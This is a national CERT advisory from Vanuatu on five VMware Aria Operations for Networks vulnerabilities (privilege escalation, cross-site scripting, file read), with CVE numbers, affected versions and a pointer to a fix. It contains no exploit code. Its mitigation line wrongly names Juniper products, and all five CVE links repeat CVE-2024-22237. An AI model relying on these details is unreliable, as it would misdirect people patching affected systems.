Advisory 51 : VMware Releases Security Advisory for Aria Operations for Network
Release Date : 6th of February 2024
Impact : HIGH / CRITICAL
TLP Rating: Clear 
CERT Vanuatu (CERTVU) and the Office of the Chief Information Officer (OGCIO) provide the following advisory.
What is it?
VMware released a security advisory to address multiple vulnerabilities in Aria Operations for Network.
- Local Privilege Escalation Vulnerability (CVE-2024-22237) Aria Operations for Networks contains a local privilege escalation vulnerability.
- Cross-Site Scripting Vulnerability (CVE-2024-22238) Aria Operations for Networks contains a cross-site scripting vulnerability.
- Local Privilege Escalation Vulnerability (CVE-2024-22239) Aria Operations for Networks contains a local privilege escalation vulnerability
- Local File Read Vulnerability (CVE-2024-22240) Aria Operations for Networks contains a local file read vulnerability.
- Cross-Site Scripting Vulnerability (CVE-2024-22241) Aria Operations for Networks contains a cross-site scripting vulnerability.
What are the Systems affected?
This issue affects:
Aria Operations for Networks version 6.12
Aria Operations for Networks 6.x
What this means?
An attacker could exploit this vulnerability and take control of the affected system.
- Local Privilege Escalation Vulnerability (CVE-2024-22237) A console user with access to Aria Operations for Networks may exploit this vulnerability to escalate privileges to gain root access to the system.
- Cross-Site Scripting Vulnerability (CVE-2024-22238) A malicious actor with admin privileges may be able to inject malicious code into user profile configurations due to improper input sanitization.
- Local Privilege Escalation Vulnerability (CVE-2024-22239) A console user with access to Aria Operations for Networks may exploit this vulnerability to escalate privileges to gain regular shell access
- Local File Read Vulnerability (CVE-2024-22240) A malicious actor with admin privilege may exploit this vulnerability leading to unauthorized access to sensitive information.
- Cross-Site Scripting Vulnerability (CVE-2024-22241) A malicious actor with admin privileges can inject a malicious Payload into the login banner and takeover the user account.
Mitigation process
Administrators are recommended to review their network for use of vulnerability Juniper Products and upgrade to the latest releases.
Download fixed version KB96450 for versions 6.x
References
- https://www.cisa.gov/news-events/alerts/2024/02/07/vmware-releases-security-advisory-aria-operations-networks
- https://www.vmware.com/security/advisories/VMSA-2024-0002.html
- https://kb.vmware.com/s/article/96450
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-22237
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-22237
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-22237
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-22237
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-22237
- Download advisory (English): VMware Releases Security Advisory for Aria Operations for Network
- Download advisory (Bislama): Mware i Rilisim Sekuriti Advaeseri blong Aria Operations for Network
- Download advisory (French): VMware publie un bulletin de sécurité concernant Aria Operations pour les réseaux